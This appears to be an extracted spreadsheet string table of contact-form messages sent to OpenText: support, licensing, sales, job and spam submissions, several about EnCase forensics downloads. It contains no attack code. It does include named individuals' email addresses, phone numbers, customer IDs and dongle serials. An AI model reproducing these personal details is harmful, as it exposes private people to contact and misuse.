    <t xml:space="preserve">Confirmation of Opentext support for our company. </t>
  </si>
  <si>
    <t>Procurement of Documentum BPM and ECM</t>
  </si>
  <si>
    <t>Greeting_x000D_
_x000D_
Currently, we are using EnCase for our forensics purposes, and we want to download the newest version of it._x000D_
_x000D_
Before, we used stevanus.a.sianturi@id.ey.com for our inquiries, and we want to change that email to ftds@id.ey.com_x000D_
_x000D_
Is it possible?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Rasyid</t>
  </si>
  <si>
    <t>Firstly, I live and work in ACT and there is no option to select "ACT" under "State or Province". It is also one of the mandatory fields so cannot skip it. Hence I have selected NSW to be able to log this request as I was unable to get through the phone._x000D_
I just have a question regarding the capability of Documentum to support secure file sharing to external users. We use Documentum at our organisation and wondering if a secure file sharing function is available within the system to enable collaboration with external parties._x000D_
_x000D_
Regards,_x000D_
Celin Baraiya</t>
  </si>
  <si>
    <t>Hey Guys, Can you please send me a billing statement?</t>
  </si>
  <si>
    <t>We are having issues with advanced settings when scanning forms into designer. We also cannot flip said forms. We are stuck using default settings, and once we try to change or enable advanced we get error messages.</t>
  </si>
  <si>
    <t>I want rightfax software</t>
  </si>
  <si>
    <t>I purchased Student Encase Forensic and I'm unable to download the software.</t>
  </si>
  <si>
    <t>Hello - We are looking for a complete AP Solution which would sit on top of our SAP S4Hana ERP to integrate our AP prcess in the following areas. Scanning, OCR, Matching, Document Management and Workflow. We believe Open Text could help and we are looking to have a chat with some one on next steps. Please let me know a contact person we can speak with? Thank you</t>
  </si>
  <si>
    <t>I was hoping to request a demo of OpenText MediaBin</t>
  </si>
  <si>
    <t>Getting error on login. Unable to proceed from base screen._x000D_
We are partner with OpenText but the account is not getting verified.</t>
  </si>
  <si>
    <t xml:space="preserve">I am doing some research into Enterprise Content Management solutions and have a few questions on your  offering:_x000D_
_x000D_
Where in the Caribbean Region has your solution been implemented?_x000D_
_x000D_
What research agencies have evaluated your solution? _x000D_
 _x000D_
Does your solution have an on premise deployment option? Is there a hybrid option to host in a server of an organization’s choosing?_x000D_
_x000D_
What is your pricing model?  Is it based on tiers? Number of users? Licence? Etc. _x000D_
 _x000D_
Who is the responsible person at your company for sales/client relations with regards to this product and what are their contact details?_x000D_
_x000D_
Specifically, where/to whom do we send a Request for Proposal?_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I've got an urgent question. I've had a customersupport account for years but now  since I see Guidance software is now OpenText I cant get access with my old Guidance account. A new registration with my corporate e-mailaddress does not result in an account with access to the download section._x000D_
_x000D_
Our Company, Hoffmann Investigations, is a client of Guidance for years now but all the download links in my ols mails doesn't work anymore, so I can't download the Encase product files at this moment. Can you please give me access to the downloads using my company e-mailadress 'w.loman@hoffmannbv.nl'_x000D_
_x000D_
Thank you in advance_x000D_
_x000D_
Kind regards_x000D_
  Willem Loman (Hoffmann Investigations, The Netherlands)</t>
  </si>
  <si>
    <t>Looking to replace my fax machines and fax lines with something more secure, provides workflow capability and costs less.</t>
  </si>
  <si>
    <t>JM</t>
  </si>
  <si>
    <t>The Ministry is interested in purchasing this software for the Cyber Incident Response Team (CIRT). I Would also like to know if you have any distributers within Jamaica.</t>
  </si>
  <si>
    <t>Hello, this is Wafaa Mohamed from Nazeq company in US. We searched your company's products on social media. Our company Nazeq helps companies find new markets for their industries._x000D_
Let's see if we can go through a beneficial partnership.</t>
  </si>
  <si>
    <t>I need the job</t>
  </si>
  <si>
    <t>Hello, I was having trouble logging on so I tried to change the password.  Open text said that the new password was sent to my email, but I never received that email from you.  Do you know the email address that it was sent to.  Will you see to it that it is my email that is associated with my User ID?  My Network ID is U082 and my User ID is U082A.  Please help me set up a new password so that I can access the catalog.  Thank you.</t>
  </si>
  <si>
    <t>Dear OpenText representative,_x000D_
_x000D_
We currently investigating of OpenText use as an invoice processing solution and integration with SAP. We already have OpenText in place, but need to get more details and maybe demo regarding usage as invoice processing solution. Thanks!_x000D_
_x000D_
Kind regards,_x000D_
Dmitri Rozenberg</t>
  </si>
  <si>
    <t>Need latest download</t>
  </si>
  <si>
    <t>verification of support contract.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText, Will you be having a conference in the United States similar to Enfuse in years past?  Or is it only the OpenText Global Conferences in Vienna, Toronto, and Singapore?_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am reaching out to your company in regards to your opentext software and seeing if you have any affiliate programs in place. I am the Account Manager for a large technology website, Techopedia, in which we provide long form educational technology content._x000D_
_x000D_
With a recent survey of our users showing a high level of interest and use of AI softwares, we believe your AI software would be a great fit for an affiliate partnership or promotional marketing campaign._x000D_
_x000D_
Our website at the moment garners over 6,000,000 unique pageviews/month with AI definition and articles receiving majority of the pageviews._x000D_
_x000D_
If your company would be interested in discussing a potential partnership agreement, you may reach may reach me with the provided contact info_x000D_
_x000D_
Thanks_x000D_
_x000D_
Steven</t>
  </si>
  <si>
    <t>I have applied for a position and it seems my email is already in use.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a strategic partnership. We are a legal technology company for lawyers to access what's market and reference materials keyed to the pulse of the blockchain industry. </t>
  </si>
  <si>
    <t>I have had multiple confirmation emails sent and clicked on the link in them to verify, but it still says I have to confirm my email when I try to enter a support ticket.</t>
  </si>
  <si>
    <t>Interested in quote for limited use of Axcelerate e-discovery for law firm</t>
  </si>
  <si>
    <t xml:space="preserve">I have EnCase 8.06 installed and when I choose to open a new case the options window it opens is significantly bigger than my resolution allows. I have attempted to change the resolution to something bigger, but it doesn't help at all. </t>
  </si>
  <si>
    <t>Support with OpenText fax to mail product._x000D_
_x000D_
Faxing options for different users.</t>
  </si>
  <si>
    <t>Hello - I'm inquiring about the software "AlchemySearch". I see you acquired Captaris, but I can't find this software on your site. Do you still provide this application, or a replacement? _x000D_
Thank you</t>
  </si>
  <si>
    <t>Hello OpenText Support, _x000D_
With regards to internal OpenText software validation project, i would like to know the latest contract details for Zimmer Biomet GmbH. Please let me know if you need any more information to provide me the details. _x000D_
Thank you,_x000D_
Javid ahamed Jaleel</t>
  </si>
  <si>
    <t>Hi, I would like to download the latest Encase (v8). How can I do that?_x000D_
Also, when I log in to my account, it always says "If you requested My Support access; you will receive an email notification from your OpenText Support representative with confirmation.". Could you please send me the confirmation mail._x000D_
_x000D_
thank you,_x000D_
Moritz</t>
  </si>
  <si>
    <t>about job</t>
  </si>
  <si>
    <t xml:space="preserve">job_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">about job </t>
  </si>
  <si>
    <t xml:space="preserve">alchemy 2003 upgrade to latest version </t>
  </si>
  <si>
    <t>Could you please send me the latest invoices for Cetera Financial group for the months of October and November 2018? Please contact me on my email, thank you</t>
  </si>
  <si>
    <t>Access to downloads / license key / support /etc.   I am trying to download my licensed copy of EnCase but do not have a new account since it was acquired by OpenText.  I'm trying to create an account and submit a support request, but the system repeatedly requests for me to confirm my email address, which I already have done twice.  I have a time sensitive request that requires access to EnCase and am hopeful that I will be able to work this out today._x000D_
_x000D_
If there is anything you can do to help me with this request, please let me know._x000D_
_x000D_
Best,_x000D_
_x000D_
..Sean.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, _x000D_
Please provide a maintenance renewal quote for this opportunity and confirm the renewal dates. _x000D_
PO: 5564812 _x000D_
Vendor: OPEN TEXT CORPORATION _x000D_
Thank you, _x000D_
</t>
  </si>
  <si>
    <t>I would like to download (to test) version 16.4 but do not have access to the download centre since my amichnik@opentext.com email was deleted a few months ago. Is there any way I can retrieve the installation software?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I need a trail version of the OpenText Recostar OCR software for evaluation.</t>
  </si>
  <si>
    <t>need rightfax support for 9.4.1 old product - I P2V'd one of the 2 physical boxes and now it's not working right. ;(</t>
  </si>
  <si>
    <t>We are in the market for an on premises eDiscovery program.  We're shopping, so we'd like to get a quote.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! I have no access to My support. Please help to restore it. I've made the ticket 3977126 and i have information that everytnig is ok with partner account now.  </t>
  </si>
  <si>
    <t>_x000D_
I am with Wells Fargo Division of Application Products Center of Excellence (APCoE), responsible for researching and identifying latest patches/ releases for 3rd Party Vendor products within the Product Management catalog._x000D_
This exercise is being performed on a Quarterly Cadence for all 3rd Party products and the objective is to keep Wells Fargo’s environment up-to date and safe._x000D_
_x000D_
Could you please let me know the latest version and release date for TeleForm Workstation._x000D_
_x000D_
Teleform Workstation latest version and release date for 16.3, 11.2 and 11.1_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Реклама Ваших товаров и услуг ! _x000D_
 _x000D_
РАССЫЛКА ПО ФОРМАМ ОБРАТНОЙ СВЯЗИ В 1 400 000 ФОРМ РОССИИ И СНГ - 3000 РУБЛЕЙ _x000D_
 _x000D_
РАССЫЛКА ПО ФОРМАМ ОБРАТНОЙ СВЯЗИ ЛЮБОЙ СТРАНЫ - 3000 РУБЛЕЙ ЗА 2 МЛН СООБЩЕНИЙ _x000D_
 _x000D_
Это отправка по формам с сайтов в разделе контакты, которые заполняются нашим роботом. _x000D_
Далее письмо с вашим предложением приходит на контактный E-mail организации. _x000D_
При отправку через форму  каждый сайт отправляет сообщение «сам себе» и поэтому все письма приходят во входящие! _x000D_
 _x000D_
 _x000D_
РАССЫЛКА ПО EMAIL КОРПОРАТИВНЫХ АДРЕСОВ РОССИИ И СНГ, БОЛЕЕ 800 000 E-MAIL - 4000 РУБЛЕЙ _x000D_
 _x000D_
РАССЫЛКА ПО EMAIL КОРПОРАТИВНЫХ АДРЕСОВ ЕВРОПЫ, АМЕРИКИ И ДР.  1 000 000 E-MAIL - 4000 РУБЛЕЙ _x000D_
 _x000D_
Не отвечайте на это сообщение со своей электронной почты, так как оно создано автоматически! _x000D_
 _x000D_
Скидка 25% на рассылку до 25 декабря! _x000D_
 _x000D_
Контакты для связи: _x000D_
sviazs@bk.ru _x000D_
Telegram: @form2018 _x000D_
Skype: 2018form</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
We are the appointed pre-employment screening representatives and have been asked to confirm that our Candidate was employed at _x000D_
_x000D_
OpenText (Actuate)_x000D_
Paris_x000D_
_x000D_
 _x000D_
I would be grateful if you could provide contact details to your HR or to the person who would be able to confirm the dates of employment and position held and I will send a request for verification with the Candidate's details._x000D_
_x000D_
_x000D_
Thank you in advance for your kind assistance._x000D_
_x000D_
Kind Regards, _x000D_
_x000D_
ROKSANA SIURDA | Service Delivery Team | Gun Court, 70 Wapping Lane | London, UK _x000D_
+44 (0) 1273 760 930 Tel | 502 0245 Internal Direct_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Our long-term supplier Mr Olaf Du Randt (Custom Made IT Solutions - South Africa), has informed me recently that he was unsuccessful in eliciting response for renewal our annual license for reasons unknown to me. Our license has since expired and we have a number of cases backlogged as a result of this. Can I urgently be advised what the result for the delay is?_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Exploring how Successfactors connects with opentext. Is it out of box?</t>
  </si>
  <si>
    <t>Hello! I have no access to my tickets and cannot open a new ticket. This mail address should be the login for the contract of Destilla GmbH, 86720 Noerdlingen. The Customer ID is 184227. _x000D_
_x000D_
Also I have no access to the DataServer (Unify, Daegis). We have bought the Version 9.1, SN 208303. Could you please also have a look at this?_x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Regards,_x000D_
_x000D_
Holger Graf</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
Our CIO is very much impressed with the functionality of OpenText Analytics and he want me to do some demo with our business logic. He just wanted to check whether it can full fill our BI requirement or not.  _x000D_
I am using trial version of OpenText Analytics and explored lit bit of it. _x000D_
So my question is, is it any way to learn some basics about OpenText Analytics? So that i can prepare some sample reports and dashboards._x000D_
I already reviewed that paid virtual class rooms but we'll think about it later once we are licence customer of OpenText._x000D_
Please provide me the links of guides, sample videos or anything if you have and any thing that can help._x000D_
Thanks in advance.  </t>
  </si>
  <si>
    <t>Searching for a job</t>
  </si>
  <si>
    <t xml:space="preserve">Please provide me with your Tax/VAT ID number for your company. Thank you in advance._x000D_
We had an invoice from you, and we need to have your complete ID data, because of your local tax legislation. </t>
  </si>
  <si>
    <t>Hello …_x000D_
No I have not tried out your SoftwareSolution yet. As far as I know nobody has done this yet here in Austria._x000D_
Probably somebody who shares the same domain somewhere in he world has done this._x000D_
So please provide me with the Credentials to test your software Opentext Analytics Suite._x000D_
_x000D_
Kind Regards,_x000D_
Karl Erber_x000D_
... and if I send an email to 'ihubtrial@opentext.com' I do not get an answer ....</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for an EIM platform for my organization. Would like to enquire about the facilities offered by Open text and price quote. Hoping to have a meeting as soon as possible. </t>
  </si>
  <si>
    <t>Hello, Yokam!_x000D_
I'm sorry, but I still haven't access to MySupport page!_x000D_
I sign in opentext Connect:_x000D_
Then, I click to MySupportLink in the bottom of form_x000D_
And still no End User License Agreement, but no access message_x000D_
Please, help!</t>
  </si>
  <si>
    <t>_x000D_
Hello,_x000D_
_x000D_
Please tell us the process to register for OpenText support for the following products:_x000D_
_x000D_
EMC Captiva_x000D_
EMC Documentum_x000D_
EMC Identificator_x000D_
_x000D_
Our local partner GEMADEC can not provide us with quality support_x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
Khalid AYOUJIL</t>
  </si>
  <si>
    <t>business</t>
  </si>
  <si>
    <t xml:space="preserve">Hello All,_x000D_
We need account activation for our customer account which is mkucukkaya@biltim.com.tr_x000D_
. Because of we need to produce lisence key for users._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Ozlem_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are an Enterprise Connect user based in Western Australia. We are hoping to get from you a list of other organisations using Enterprise Connect located in Western Australia so we can network and share system design with each other. Is this something you're able to provide us with?_x000D_
Many thanks,_x000D_
Frank Flintoff</t>
  </si>
  <si>
    <t>Hi._x000D_
When I am trying to connect En Case 8 downloads I've received this error message: Content Server Error: _x000D_
_x000D_
[Sorry, no exact match was found for an item with the Nickname "74727693". Either it does not exist or you do not have permission to access it. If you were sent a link to this item, please contact the sender for assistance.]_x000D_
_x000D_
What does it mean?_x000D_
Thank You</t>
  </si>
  <si>
    <t>Do you have composer tool for migrating Lotus Notes Domino application to ASP NET applications?</t>
  </si>
  <si>
    <t>Hi, i have updated the DM from 5.3.1 to DM 16._x000D_
However, I have facing a problem of some scanning device cannot scan into the updated DM server._x000D_
_x000D_
The program is using C# language, and we found the error message of _x000D_
"Cannot load the DM Server interface. The DM server may not be started.”_x000D_
_x000D_
I have studied some of the web articles, seems it is related to the setting of the DM connection wizard, may I know any setting and package for the DM connection wizard to support HTTPS portal or any reference for "OpenText document 30559992 on how to use the HTTPS Certificate Installer"?_x000D_
_x000D_
Many thanks for your assist_x000D_
Best Regards,_x000D_
Jackie</t>
  </si>
  <si>
    <t>Hi _x000D_
_x000D_
I'm following up from an enquiry i put in a few weeks ago around a new Cyber teaching program we are commencing in 2019 and wondering if you can offer Encase for our teaching laboratory?_x000D_
_x000D_
thanks and regards_x000D_
Connie McIntosh</t>
  </si>
  <si>
    <t>We are currently on Teamsite 7.5 and need to discuss some queries regarding Teamsite upgrade.</t>
  </si>
  <si>
    <t xml:space="preserve">Savar Dhaka Bangladesh was sent my name to my Money in my Address </t>
  </si>
  <si>
    <t xml:space="preserve">Savar Dhaka1340 Bangladesh Local Bank Transfer Money </t>
  </si>
  <si>
    <t>Application of job</t>
  </si>
  <si>
    <t>could you please solve this problem now? We are unable to log in to the portal in any way the "web server error" in the form of an error. We're tired of texting your company. Please send me the direct download link of the Encase Forensic software. Your customers, but you are not interested in any way. I can't download the software from the link you submitted. He wants me to log in to the portal. I am logging in but I am constantly getting the error "Web server error". We have been using this software for many years. However, after purchasing opentext company encase, we started experiencing a lot of problems and we urgently ask you to solve these problems.</t>
  </si>
  <si>
    <t>065 9910 894</t>
  </si>
  <si>
    <t>Would like to enquire if your services provide help on IG aspects for NHS digital toolkit aspects.</t>
  </si>
  <si>
    <t>Dear OpenText I'm in trouble while registering on careers portal. I'm not able to register my email giacomo.squiccimarro@gmail.com, and if I try to recover the password I never receive the email. May you please help me?_x000D_
Regards._x000D_
Giacomo Squiccimarro</t>
  </si>
  <si>
    <t xml:space="preserve">شكرت الكم_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">0506226213_x000D_
</t>
  </si>
  <si>
    <t>Rizwanuddan@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">LOOKING FOR JOB CHANGE </t>
  </si>
  <si>
    <t>Looking for Solutions in BPM and ECM</t>
  </si>
  <si>
    <t>Do you have a full course trining that teaches OpenText content server from a beginner to an administrator ?</t>
  </si>
  <si>
    <t>Is there an admin training course that concentrate on how to use the OpenText content server of version 10 as an admin? Is this train course available in Kuwait or other countries?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam_x000D_
We are a security company located in Riyadh, Saudi Arabia. _x000D_
Currently, we have requirements for your solution. _x000D_
We would like to represent your company in Saudi Arabia and the United Arab Emirates._x000D_
if you need a reference you may contact Mr. Michael Scantland- REI International Sales Manager_x000D_
Telephone: +931-537-6032_x000D_
  _x000D_
Best Regards _x000D_
____________________x000D_
Abdullah I. Almusehel, Phd. MSc, CSE, ASC. TSCM . AML. R.T. Gen. _x000D_
Founder and CEO _x000D_
Alebda Al Thulathi for trading Co. (3Di)_x000D_
</t>
  </si>
  <si>
    <t>Flower    Mart</t>
  </si>
  <si>
    <t>us j s j f j</t>
  </si>
  <si>
    <t>saf</t>
  </si>
  <si>
    <t>sdfhg</t>
  </si>
  <si>
    <t>HT</t>
  </si>
  <si>
    <t>zzzzzz内容zzzzzz</t>
  </si>
  <si>
    <t xml:space="preserve">Job </t>
  </si>
  <si>
    <t>Looking for a job urgently please contact me at the following numbers _x000D_
0822372142_x000D_
0603596656</t>
  </si>
  <si>
    <t>Do you get CPEs for passing any of the EnCE or CSRP exams?</t>
  </si>
  <si>
    <t>I need Suger mama</t>
  </si>
  <si>
    <t>KP</t>
  </si>
  <si>
    <t xml:space="preserve">Huynhgia </t>
  </si>
  <si>
    <t>Pricing for a  fax to email solution that is HIPAA compliant</t>
  </si>
  <si>
    <t>NICE</t>
  </si>
  <si>
    <t>thankyou</t>
  </si>
  <si>
    <t>dfe</t>
  </si>
  <si>
    <t>nice</t>
  </si>
  <si>
    <t>dwqa</t>
  </si>
  <si>
    <t>sdgf</t>
  </si>
  <si>
    <t>Hduaifj</t>
  </si>
  <si>
    <t>eqweqweq</t>
  </si>
  <si>
    <t>dsagdfhs</t>
  </si>
  <si>
    <t>I need between 500 and 1000 medical files processed per year.  Our company creates Independent Medical Reports from these files.  I am not sure which of your products would be a fit for us.  Can someone call me to discuss.</t>
  </si>
  <si>
    <t>Hi there - i believe we have an account with GSX and have a need to set up items for Dillards.  Can you please assist.</t>
  </si>
  <si>
    <t>l need job to satisfy my needs</t>
  </si>
  <si>
    <t>I am trying to use EnCase Forensics to image a Dell Venue 8 Pro (3845) tablet running a Windows operating system. Being that this device is a "host" device running it's own Windows operating system, is there any way I can help EnCase recognize this device and/or have some type of work around for this?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Consult about opentext's B2B services.</t>
  </si>
  <si>
    <t>want more info about OpenText Redact-It and it features</t>
  </si>
  <si>
    <t>We use GE Desktop for our X12 and EDIFACT documents. We use a separate application for SPEC2000 Type B messages. We would like to know if you have something that could handle all these EDI documents in a single platform.</t>
  </si>
  <si>
    <t>Interested in a fax solution for workgroup of 20 people.  we want them each to have 1 or 2 fax numbers.  we want them to be able to fax from their desktop apps (like outlook)  and get faxes in their inbox.  we have banks of local numbers to use._x000D_
Thanks,_x000D_
mb</t>
  </si>
  <si>
    <t>We are looking for a document management solution with several capabilities.  I would like to have a quick call with you regarding what you have to offer.  We are looking for a document management system that offers workflow, data capture and the ability to use the data in the document management system as well as export date to decision management and claims system.</t>
  </si>
  <si>
    <t>have a nice day,_x000D_
encase download center is not working can you send me a link to the new version?</t>
  </si>
  <si>
    <t>Questions about automating converting PDF's to ADA compliant PDF's. We churn out 200+ school lunch menus per month that are uploaded to clients sites. Now we need an ADA compliant version of those menus. Does your tool accomplish this in an automated processes? All of the school menus have the same format - diff content per month.</t>
  </si>
  <si>
    <t>Good women</t>
  </si>
  <si>
    <t>I would like to know if there is going to be an EnFuse 2019?</t>
  </si>
  <si>
    <t>hi!_x000D_
I´d like to know if there is any difference between install Encase Endpoint in a Windows Server and a Windows 10 for example._x000D_
Tks!</t>
  </si>
  <si>
    <t xml:space="preserve">for info content management.... TEST </t>
  </si>
  <si>
    <t xml:space="preserve">What is the contact information for your organization responding to a potential RFI or RFP?  </t>
  </si>
  <si>
    <t xml:space="preserve">Interested in hearing about AppXtender and the costs involved for a long term storage solution. Mortgage Cadence recommended you guys. Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">Bangladesh </t>
  </si>
  <si>
    <t>Hello, I am looking for some training with Content Server as I am a fairly newer OpenText user. Is there any training available either online or in person for earlier 2019 that we can pre-pay for in 2018?</t>
  </si>
  <si>
    <t>We need to find out how to obtain a copy of our most recent service contract.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
_x000D_
I am from India. I am working as an English to Gujarati Translator and Proofreader since more than 13 years. I am native person._x000D_
_x000D_
I am also working with Trados Cat Tools. Please find my resume attached herewith._x000D_
 _x000D_
I can manage other Indian Languages._x000D_
 _x000D_
Thanking you,_x000D_
_x000D_
Hitesh Shukla - India_x000D_
Cell: +91 98252 96069_x000D_
</t>
  </si>
  <si>
    <t>We have a customer using OpenText on-premise, but they are looking to migrate to OpenText Content Server hosted in Azure.  We have some pre-sales questions that will help the customer make the necessary purchase.  I appreciate any guidance you can give us, thank you.</t>
  </si>
  <si>
    <t>I am looking for someone to come in to us to review our use of OpenText in HR to see if we are maximising use and whether we can benefit from anything else you offer.</t>
  </si>
  <si>
    <t>I am looking to understand what solutions OpenText has for archive, retention and search of faxes sent/received in OpenText Cloud faxing (our current solution).  Are there connectors into things like Enterprise Vault, or other archiving solution APIs, or a module to deliver content as SMTP mail to Exchange journal servers, etc. -- even 3rd party solutions for archiving/eSurveillance/eDiscovery of the data.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I have a use case where my client has opentext internally, i was wondering if they could integrate it to salesforce using :OpenText Extended ECM for Salesforce ._x000D_
Is there additionnal cost applied to it?_x000D_
If not what are integration best practices to link open text with salesforce?</t>
  </si>
  <si>
    <t>Looking for subcontract job specializing in plaster and Bricklaying, renovation, painting, tilling, drive ways,and paving</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Do you sell to resellers?  We have a customer who is wanting a quote for quantity 1 of Opentext Exceed.</t>
  </si>
  <si>
    <t>Interested in demo of OCR product for translating cursive text to data file.</t>
  </si>
  <si>
    <t>I'm looking for your service to be part of it to procide with my studies and to have a job.</t>
  </si>
  <si>
    <t>I have 15 years of experience selling Content Services into insurance globally.  I am interested in what career opportunities there might be in my field specialty at OpenText</t>
  </si>
  <si>
    <t>I am trying to get a quote for Hummingbird Exceed for Win10</t>
  </si>
  <si>
    <t>I am interested in extending our products with the capability of your platform/solutions _x000D_
_x000D_
Like you decribed it on your website unter /products-and-solutions/partners-and-alliances/extend-your-software</t>
  </si>
  <si>
    <t>I have done my NCV level 4 Marketing management</t>
  </si>
  <si>
    <t xml:space="preserve">i need job </t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
Could you please open rights for this email address florian.breant@fremach.com to reach your support portal? _x000D_
We have edocs licenses including maintenance and I need your help concerning migration from 5.2 to 16._x000D_
thx for your help and quick answer;_x000D_
Best regards,_x000D_
Florian</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know the features provided by OpenText Redact-It Enterprise with regards to Redaction. On your website, there is very limited details available. We are in the process of identifying a Redaction tool for one of our customers. Their existing product supports redaction, annotation, stamping, page sizing, page straightening, zoom-in/out, redacting multiple pages in a single window, scrolling to next page, etc., </t>
  </si>
  <si>
    <t>Hello,_x000D_
I am a longtime user of EnCase Forensic. For some time now I have tried to have my registration confirmed on your support page. That does not work. I need the latest version of EnCase and access to the EnCase user forum for my work. My EnCase Forensic Dongles: G2002022144, G2002022145, G2002022146, G2002022147._x000D_
Can you help me?_x000D_
Regards_x000D_
Shorow</t>
  </si>
  <si>
    <t>Hi help about the job I driving licence C10 PDP/ grade12 /2019</t>
  </si>
  <si>
    <t>Because I need a job</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
This is Yingjie from Sopra Steria Asia. Right now we are going for a Singapore government tender and we are considering Documentum to be the solution._x000D_
My team has a few questions that we would like to clarify regarding Documentum. _x000D_
Please contact me as soon as possible so we can move forward._x000D_
_x000D_
Thank You_x000D_
Yingjie_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are helping the Bank of China Hong Kong for Hummingbird Exceed quotation. </t>
  </si>
  <si>
    <t>Our company already bought Brava! for SharePoint - all features, all formats - Client,  but can't   get access to My Support page to download license keys. I don't recieve any email when request access to My Support. I have all data, such as System ID/serial number/PIN</t>
  </si>
  <si>
    <t>dear sirs, could you please let me have a list of italian partner of yours? thank you in advance</t>
  </si>
  <si>
    <t>Buy a book</t>
  </si>
  <si>
    <t>feds</t>
  </si>
  <si>
    <t>nohting</t>
  </si>
  <si>
    <t>sa</t>
  </si>
  <si>
    <t>fwesdg</t>
  </si>
  <si>
    <t>fdgfghgfhs</t>
  </si>
  <si>
    <t>We are interested on EnCase EDR. We would like to know if you are open for distribution partnership here in the Philippines.</t>
  </si>
  <si>
    <t>vfghuyf</t>
  </si>
  <si>
    <t>dwfa</t>
  </si>
  <si>
    <t>- we are looking for a complete DMS and Email management system which is cloud based and able to provide 24/7 support across 3 regions (Australia, UK, Singapore).</t>
  </si>
  <si>
    <t>Hey My Friend,_x000D_
_x000D_
IdeasPCB is a Chinese manufacturer of standard technology PCB and PCBA, we specialise in providing prototype and batch PCB/PCBA for designers, product development departments, various types of electronics companies, universities, research institutions, etcetera._x000D_
_x000D_
If you have any need for pcb/pcba, we will be very glad to help you. :)_x000D_
_x000D_
Best Regards,_x000D_
Joyce Wong</t>
  </si>
  <si>
    <t>I'm being required by OpenText to get a training course from the "Learning Central", but I'm getting a "General Error" result every time I try to launch it. I'm also getting a zero score while I haven't really gotten a chance to access the course. I have screenshots I could send you. Kindly contact me asap, please. Thank you.</t>
  </si>
  <si>
    <t>Downloaded AppleWorks program because I was familiar. With AppleWorks 6 on my laptop. Anyway the new app keeps asking for a server name and I don’t have one. What do I do?</t>
  </si>
  <si>
    <t>How do I send you my excel file  called Electronic Funds Transfer form submission via Hightail?</t>
  </si>
  <si>
    <t xml:space="preserve">Good day,_x000D_
_x000D_
We need to complete an employment verification for a former employee. Can you please provide the correct contact for this? </t>
  </si>
  <si>
    <t>Bills</t>
  </si>
  <si>
    <t>Quick question. HPE is considering an upgrade from OpenText Server (AS9.7.1) to the newest version. Can you point me to the correct product you would recommend.  The only features that are used is from SAP ECC6 using CV01N.  (SAPHTTP.)  All they do is store docs and retrieve docs. No scanning stations, etc...  We worked with Michael Capuse in 2011</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for code 10 PDP job </t>
  </si>
  <si>
    <t>Over the summer we upgraded our Application Xtender software from EMC's 8.7 to OpenText 16.3.  With the switch to OpenText, could you help me get a username and password for your support site so that I can investigate issues we're having with the Index Importing feature?  I would also like to be able to review any documentation that you might have for Application Xtender._x000D_
_x000D_
Thanks,_x000D_
Amy</t>
  </si>
  <si>
    <t>Sales enquiry...Would like to get an account created for the file transfer from one business and other and maintain the protocol year through</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in Fax2Mail solution </t>
  </si>
  <si>
    <t>Product_x000D_
Number Qty Product_x000D_
Unit_x000D_
Price_x000D_
Period of Performance: 1 January 2019 to 31 December 2019_x000D_
1000029383 7500_x000D_
Open Text DocuLink for SAP Standard Named Users (LiveLink ECM DocuLink for SAP_x000D_
Solutions) Software Maintenance Renewal_x000D_
1000033167 77_x000D_
Metastorm Integration Manager Managed File Transfer Node – Distributed Software_x000D_
Maintenance Renewal_x000D_
1000035157 420 Desktop Viewer View Concurrent Software Maintenance Renewal_x000D_
1000029551 500 LiveLink for SAP Solutions - Document Archiving HP Software Maintenance Renewal_x000D_
1000033183 2_x000D_
Metastorm Integration Manager Enterprise Server – Distributed Software Maintenance_x000D_
Renewal_x000D_
1000029553 1000_x000D_
Open Text Archiving &amp; Document Access for SAP Solutions (LiveLink ECM Suite for SAP_x000D_
[Occ]) Software Maintenance Renewal_x000D_
1000035075 50 Desktop Viewer View Markup Edit Concurrent Software Maintenance Renewal_x000D_
1000035103 120 Desktop Viewer View Markup Concurrent Software Maintenance Renewal_x000D_
1000029382 6000_x000D_
Open Text DocuLink for SAP Web Named Users (LiveLink ECM DocuLink for SAP Web_x000D_
Users) Software Maintenance Renewal_x000D_
1000035125 20 Desktop Viewer View Markup Edit 3D+ Concurrent Software Maintenance Renewal_x000D_
1000033187 2 Metastorm Integration Manager Workbench Software Maintenance Renewal_x000D_
1000029331 1_x000D_
Ecosystem (SAP/Microsoft/Oracle) Solutions (Direct Sale Only) Protect Anytime_x000D_
Software Maintenance Renewal_x000D_
1000032794 1 MetaStorm Protect Anytime</t>
  </si>
  <si>
    <t>I'm currently a student at the University of Central Florida and would like to know how to purchase Encase Forensic Academic Version.</t>
  </si>
  <si>
    <t xml:space="preserve">We need to download the RightFax Client Application in order to make it available for VISA Users. Please advise. Thank you, Lazaro E </t>
  </si>
  <si>
